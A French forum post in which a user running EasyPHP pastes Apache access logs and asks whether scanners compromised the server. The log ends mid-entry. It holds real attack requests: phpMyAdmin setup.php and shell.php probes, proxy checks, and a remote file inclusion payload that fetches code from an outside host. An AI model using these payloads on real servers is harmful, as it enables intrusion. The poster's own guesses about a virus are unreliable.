Mon serveur web, est-il réellement hacké ?
ngmsky
Messages postés
4
Statut
Membre
-
ngmsky -
ngmsky -
Bonjour,
Je fais des testes de mon site web en local sur easyphp 2.10 (windows xp) et il m'arrivait d'ouvrir la connexion au publique pour permettre à mes amis voir mon site à distance et donner leur avis.
Seulement, je n'avais pas pris toutes les mesures de secu nécéssaires : exemple permettre seulement un certain nombre d'ip et interdir le reste.
C'est le cas, maintenant.
Mon probleme c'est que, en jettant un coup d'oeil dans mon fichier acces.txt contenu dans C:\Program Files\EasyPHP5.2.10\apache\logs j'ai constaté qu'il y'a des plusieurs IP qui me sont inconnu. Et en voyant leur geolocation, ils sont hors de la france. par exemple la 1ere IP est de la chine, la 2ieme de SWITZERLAND, etc.
N'etant pas très sûr de mon interpretation de ses attanques, j'aimerai que vous me dites si ils ont pu insérer quelques choses sur mon seurveur, ou s'il ont pu accéder aux données du serveur ou si aucontraire toutes les attaques listées ci-dessous ont échoués.
Meri d'avance pour vos commentaires.
Voici enfin les entrées correspondantes aux attaques :
Je fais des testes de mon site web en local sur easyphp 2.10 (windows xp) et il m'arrivait d'ouvrir la connexion au publique pour permettre à mes amis voir mon site à distance et donner leur avis.
Seulement, je n'avais pas pris toutes les mesures de secu nécéssaires : exemple permettre seulement un certain nombre d'ip et interdir le reste.
C'est le cas, maintenant.
Mon probleme c'est que, en jettant un coup d'oeil dans mon fichier acces.txt contenu dans C:\Program Files\EasyPHP5.2.10\apache\logs j'ai constaté qu'il y'a des plusieurs IP qui me sont inconnu. Et en voyant leur geolocation, ils sont hors de la france. par exemple la 1ere IP est de la chine, la 2ieme de SWITZERLAND, etc.
N'etant pas très sûr de mon interpretation de ses attanques, j'aimerai que vous me dites si ils ont pu insérer quelques choses sur mon seurveur, ou s'il ont pu accéder aux données du serveur ou si aucontraire toutes les attaques listées ci-dessous ont échoués.
Meri d'avance pour vos commentaires.
Voici enfin les entrées correspondantes aux attaques :
Fichier de logs : C:\Program Files\EasyPHP5.2.10\apache\logs // Spoofing (Forwarding) ? A t-il reussi ? Jer pense que non, vu le code 403. Est-ce mon serveur ou celui ciblé par hackeur qui a géner cet erreur 403 ? 58.218.204.110 - - [03/Mar/2011:02:43:09 +0100] "GET http://98.126.64.106/judge123.php HTTP/1.1" 403 1057 // Encore spofing ? 58.218.204.110 - - [05/Mar/2011:16:55:19 +0100] "GET https://www.hugedomains.com/domain_profile.cfm?d=shopsline&e=com HTTP/1.1" 403 1061 195.70.10.116 - - [05/Mar/2011:21:52:51 +0100] "GET //jmx-console/ HTTP/1.1" 403 1072 86.52.157.9 - - [06/Mar/2011:10:05:44 +0100] "GET / HTTP/1.0" 403 1072 80.108.29.138 - - [06/Mar/2011:10:30:30 +0100] "GET / HTTP/1.0" 403 1072 58.218.204.110 - - [07/Mar/2011:10:14:37 +0100] "GET https://www.hugedomains.com/domain_profile.cfm?d=eduju&e=com HTTP/1.1" 403 1057 // Encore du spoofing ? 58.218.204.110 - - [08/Mar/2011:18:40:34 +0100] "GET http://58.218.199.147:7182/judge.php HTTP/1.1" 403 1058 58.218.204.110 - - [08/Mar/2011:22:48:50 +0100] "GET http://www.mtajp.com/proxyheader.php HTTP/1.1" 403 1057 58.218.204.110 - - [09/Mar/2011:15:15:24 +0100] "GET http://www.racross.com/proxyheader.php HTTP/1.1" 403 1059 58.218.204.110 - - [09/Mar/2011:23:38:31 +0100] "GET http://98.126.15.13/proxyheader.php HTTP/1.1" 403 1056 58.218.204.110 - - [10/Mar/2011:12:00:28 +0100] "GET http://piceducation.com/proxyheader.php HTTP/1.1" 403 1060 58.218.204.110 - - [10/Mar/2011:16:09:27 +0100] "GET https://www.hugedomains.com/domain_profile.cfm?d=eduju&e=com HTTP/1.1" 403 1057 // C'est tres bizard car mon reseau local est en 192.168.1.x Et là, j'ai du 192.168.56.x ou plutôt 192.168.x.y. Cela me laisse penser qu'ils ont réussi à injecter un script (virus) qui a du créer un reseau local virtuel sur mon PC et a ensuite créer une un port ethernet virtuel a qui il a attribué (par DHCP) cette fameuse adresse (192.168.56.1). Je ne suis pas sûr de ceque je viens de dire c'est pour cela que votre analyse me rendra vraiment service. Quelle etait son but ici, changé la directive Options de apache (pour la racine du serveur (/) ? 192.168.56.1 - - [16/Mar/2011:13:59:08 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [16/Mar/2011:13:59:09 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [16/Mar/2011:13:59:10 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [16/Mar/2011:14:11:37 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [16/Mar/2011:14:11:37 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [17/Mar/2011:20:54:33 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [17/Mar/2011:20:54:34 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [17/Mar/2011:20:54:44 +0100] "OPTIONS / HTTP/1.1" 403 1073 192.168.56.1 - - [17/Mar/2011:20:55:15 +0100] "OPTIONS / HTTP/1.1" 403 1073 // spoofing ? 58.218.204.110 - - [29/Mar/2011:10:41:03 +0200] "GET http://58.218.204.110:7182/judge.php HTTP/1.1" 403 1058 58.218.204.110 - - [29/Mar/2011:19:01:01 +0200] "GET https://www.hugedomains.com/domain_profile.cfm?d=shopsline&e=com HTTP/1.1" 403 1061 // 173.236.91.231 - - [30/Mar/2011:13:33:32 +0200] "GET / HTTP/1.1" 403 1072 62.149.165.115 - - [31/Mar/2011:11:52:01 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 222.187.221.224 - - [01/Apr/2011:14:14:38 +0200] "GET http://98.126.15.13/proxyheader.php HTTP/1.1" 403 1056 92.240.68.153 - - [01/Apr/2011:14:41:31 +0200] "GET http://www.zuneworld.com/?f HTTP/1.1" 403 1061 72.67.101.2 - - [01/Apr/2011:19:15:22 +0200] "GET /webdav/ HTTP/1.0" 403 1067 58.218.204.110 - - [01/Apr/2011:22:40:37 +0200] "GET http://www.travelimgusa.com/ip.php HTTP/1.1" 403 1064 58.218.204.110 - - [05/Apr/2011:16:52:17 +0200] "GET http://www.racross.com/proxyheader.php HTTP/1.1" 403 1059 50.56.83.99 - - [06/Apr/2011:14:38:20 +0200] "GET /xampp/phpinfo.php HTTP/1.1" 403 1058 50.56.83.99 - - [06/Apr/2011:14:38:20 +0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 403 1058 200.6.115.76 - - [06/Apr/2011:20:38:11 +0200] "GET /webdav/test HTTP/1.1" 403 1058 62.129.181.201 - - [06/Apr/2011:22:10:02 +0200] "HEAD /robots.txt HTTP/1.0" 403 - 184.73.220.112 - - [07/Apr/2011:10:33:48 +0200] "GET /appserv/main.php?appserv_root=http://bakken.com/website/t.txt? HTTP/1.1" 403 1058 222.187.221.224 - - [08/Apr/2011:10:59:47 +0200] "GET http://98.126.64.106/judge123.php HTTP/1.1" 403 1057 92.240.68.152 - - [22/Apr/2011:20:46:32 +0200] "GET http://img8.imageshack.us/img8/6840/treehouse2wn1.jpg HTTP/1.1" 403 1062 200.55.208.196 - - [22/Apr/2011:23:04:56 +0200] "GET /include/shell.php?x=x HTTP/1.0" 403 1058 58.218.199.250 - - [24/Apr/2011:02:16:17 +0200] "GET https://www.hugedomains.com/domain_profile.cfm?d=shopsline&e=com HTTP/1.1" 403 1061 90.0.205.34 - - [27/Apr/2011:10:31:36 +0200] "e{\x85[\xfd)\x04\xc5\x88" 403 1067 58.218.199.250 - - [28/Apr/2011:07:02:23 +0200] "GET http://www.cjpjp.com/proxyheader.php HTTP/1.1" 403 1057 58.218.199.250 - - [28/Apr/2011:09:18:48 +0200] "GET https://www.hugedomains.com/domain_profile.cfm?d=eduju&e=com HTTP/1.1" 403 1057 58.218.199.250 - - [30/Apr/2011:16:47:37 +0200] "GET http://98.126.64.106/judge123.php HTTP/1.1" 404 1069 // Hacking ?? 79.94.118.60 - - [01/May/2011:14:06:00 +0200] "\v\x8e\x1dd\xba\x95\x92\x90W=\xd3\x12\xde\xd4j\x13\xa9 6\"\xa4\xae#\xd14\xa6\x0c\xf4\x98\x14" 400 226 85.114.128.137 - - [02/May/2011:01:00:59 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 1058 85.114.128.137 - - [02/May/2011:01:00:59 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1070 85.114.128.137 - - [02/May/2011:01:00:59 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1070 85.114.128.137 - - [02/May/2011:01:00:59 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 1070 85.114.128.137 - - [02/May/2011:01:00:59 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1070 85.114.128.137 - - [02/May/2011:01:01:00 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1070 81.201.60.163 - - [02/May/2011:01:50:56 +0200] "GET /sd/1M HTTP/1.1" 404 1067 81.201.60.163 - - [02/May/2011:07:54:44 +0200] "GET /sd/1M HTTP/1.1" 404 1067 // Hacking ? 123.30.109.21 - - [03/May/2011:18:01:39 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1070 123.30.109.21 - - [03/May/2011:18:01:40 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1070 123.30.109.21 - - [03/May/2011:18:01:40 +0200] "GET HTTP/1.1" 400 992 123.30.109.21 - - [03/May/2011:18:03:26 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 1058 123.30.109.21 - - [03/May/2011:18:03:26 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1070 123.30.109.21 - - [03/May/2011:18:03:27 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1070 123.30.109.21 - - [03/May/2011:18:03:28 +0200] "GET HTTP/1.1" 400 992 // Encore du hacking ? 80.12.167.170 - - [04/May/2011:23:48:34 +0200] "\x82A\xce\r\xea\x11\xdf\x05\x85\x05nL\x1e|6\xc8\x07l\x03\xbb" 400 992 92.157.197.93 - - [06/May/2011:02:25:24 +0200] "\xe2!!P\xfc8o\x9c]6\xe0\xae\xf7%" 501 999 78.231.117.5 - - [06/May/2011:11:50:07 +0200] "i\xcd\xad\xc9\xef\xea,\xf6\x9cL\xd3\xa8(!7\x8fh\x13N\xd6Ci\xd6\xf9\x9e\x0ef" 501 999 116.255.163.100 - - [20/May/2011:11:05:22 +0200] "GET //phpmyadmin/ HTTP/1.1" 404 1070 116.255.163.100 - - [20/May/2011:11:05:23 +0200] "GET //mysql/ HTTP/1.1" 404 1070 116.255.163.100 - - [20/May/2011:11:05:24 +0200] "GET // HTTP/1.1" 200 2466 82.237.169.12 - - [25/May/2011:23:53:15 +0200] "\x1d\xa0\x12^z\xedpD\xc0\xccK\xfd\x19\xf8\xc6YM\x0es\x05\xd2\vv\xa3\xcf\xa2]\x88\x8b!jr\v\xd2\x80\xb7\xc1\xc4\x87M" 400 226 86.214.22.92 - - [26/May/2011:10:21:37 +0200] "M1*\xac\xc8\xa4HY\xb1\x828\x86Xq\xad\x8ak!8\xa5\xe7\x82\xfd\xect\xd4\xb4Zh\x8b\xedg\x1c\xa3\x8d\xe8(=\xc6Od\xe3l\x90\x1d\xc1" 501 999 92.145.241.72 - - [27/May/2011:11:59:33 +0200] "\x11\xc1" 501 999 // Vu qu'il y'a le code reponse 200, Hacking reussi ????? 46.161.10.51 - - [29/May/2011:22:09:56 +0200] "GET http://allrequestsallowed.com/?PHPSESSID=5gh6ncjh00043VZMTUP_FAL%5CUDU HTTP/1.1" 200 2466 // Fin de Vu qu'il y'a le code reponse 200, Hacking Reussi ????? 93.144.29.219 - - [30/May/2011:21:55:54 +0200] "\x839\xa8 \x12" 400 992 81.56.101.79 - - [01/Jun/2011:13:15:35 +0200] "\xb2+r+\xe0\xe6\xf6\x96\xd3|\x07\xc6\x0cd\x04\x058\xf1?\x10\xbd\xa5\xb4\xa2s\xa5\xce\xa3'h)|\xdc\x1c:\xb54\xca\x9e\xde\xbb#\xa9\xde\xde]%\xe9\x82" 400 992 69.46.96.183 - - [01/Jun/2011:23:14:07 +0200] "GET / HTTP/1.0" 200 2466 82.242.195.206 - - [02/Jun/2011:03:06:02 +0200] "N\x03\xb7\xde\x13P\xccM\xc6\x8e\xe6\x89\xfb" 501 999 67.32.139.254 - - [03/Jun/2011:02:21:10 +0200] "GET / HTTP/1.0" 200 2466 86.65.48.85 - - [20/Jun/2011:15:34:37 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 86.67.171.75 - - [25/Jun/2011:13:24:52 +0200] "\xc7W\xc3\xec\b\x12\x11\x1bnQR\xadJ\xf9o|r\xa3\xa76M\xe9\xaf$f\x9cx\x83\x96>\xe5\xc6\x15b\xb0\xfe\xc4!\xe7CT\xf1\xca\xd7\xc3\xad\xcb\x8d\xeb\x9cW\xe9Z\xccQ\xaa" 501 1037 // C'est quoi A la place de IP source ? le nom d'hote (machine ds reseau local) source ? 192.168.1.2 - - [26/Jun/2011:11:12:55 +0200] "GET /favicon.ico HTTP/1.1" 404 1180 sn1038425503106 - - [26/Jun/2011:11:13:27 +0200] "GET /monsite.com/index.php?osCsid=4a6p9kom745iecp8ruvk23joa3 HTTP/1.1" 403 1170 sn1038425503106 - - [26/Jun/2011:11:13:27 +0200] "GET /favicon.ico HTTP/1.1" 404 1180 sn1038425503106 - - [26/Jun/2011:11:13:44 +0200] "GET /monsite.com/index.php?osCsid=4a6p9kom745iecp8ruvk23joa3 HTTP/1.1" 403 1170 192.168.1.2 - - [26/Jun/2011:11:13:44 +0200] "GET /favicon.ico HTTP/1.1" 404 1180 sn1038425503106 - - [26/Jun/2011:11:13:47 +0200] "GET /monsite.com/index.php?osCsid=4a6p9kom745iecp8ruvk23joa3 HTTP/1.1" 403 1170 192.168.1.2 - - [26/Jun/2011:11:13:47 +0200] "GET /favicon.ico HTTP/1.1" 404 1180 sn1038425503106 - - [26/Jun/2011:11:13:56 +0200] "GET /monsite.com/index.php?osCsid=4a6p9kom745iecp8ruvk23joa3 HTTP/1.1" 403 1170 // FIN DE : C'est quoi A la place de IP source ? le nom d'hote (machine ds reseau local) source ? // Ceci me parait louche. Est-ce normal ? Plus de 60 requettes en 2 seconde ! Le pire c'est que l'ip source est 127.0.0.1. C'est comme s'ils avaient réussi à installé un virus sur mon pc. 127.0.0.1 - - [20/Jun/2011:20:09:01 +0200] "GET /home/index.php HTTP/1.1" 200 53719 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/styles.css HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/top_section_in.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/top_section_out.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/top_version.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/admin.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/top_title.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /images_easyphp/i18n_en.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /images_easyphp/i18n_fr.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /images_easyphp/i18n_it.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /images_easyphp/i18n_es.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /images_easyphp/i18n_nw.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /images_easyphp/i18n_pt.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/bar_info.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /images_easyphp/i18n_pt_br.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/apache.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/chiffre_2.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/chiffre_..gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/chiffre_1.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/chiffre_3.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/button_small_left.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_small_L.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_small_I.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_small_C.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_small_E.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_small_N.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/button_small_right.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/button_left.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/button_arrow.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_w.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_e.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre__.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_b.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_l.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_c.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_o.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/lettre_a.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/button_right.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:02 +0200] "GET /home/images_easyphp/localweb.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/alias_path.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/localweb_doc.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_+.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_A.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_L.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_I.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/alias.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_S.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/mysql.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/chiffre_7.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/alias_add.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_p.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/chiffre_5.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_h.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_y.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_m.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_d.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_i.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/bar_550.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_n.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/php.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/phpmyadmin_usredit.png HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/chiffre_0.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_N.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_H.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_P.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_F.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_O.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/timezone_logo.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/refresh.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_E.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/submit_select.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_X.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_T.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/sqlite.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/chiffre_8.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_q.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_s.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_t.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/usb_key.png HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/lettre_r.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/top_background.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/bar_info_bg.gif HTTP/1.1" 304 - 127.0.0.1 - - [20/Jun/2011:20:09:03 +0200] "GET /home/images_easyphp/easyphp_favicon.ico HTTP/1.1" 200 1078 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_2.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/apache.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_..gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_1.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_3.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_small_L.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/button_small_left.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_small_E.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_small_I.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_small_N.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_small_C.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/button_small_right.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/button_arrow.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/button_left.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_e.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_w.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre__.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_l.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_b.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_c.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_o.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/button_right.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_a.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/localweb.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/localweb_doc.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/alias_path.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_+.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_A.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_I.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_S.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_L.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/alias.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/top_background.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/alias_add.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET 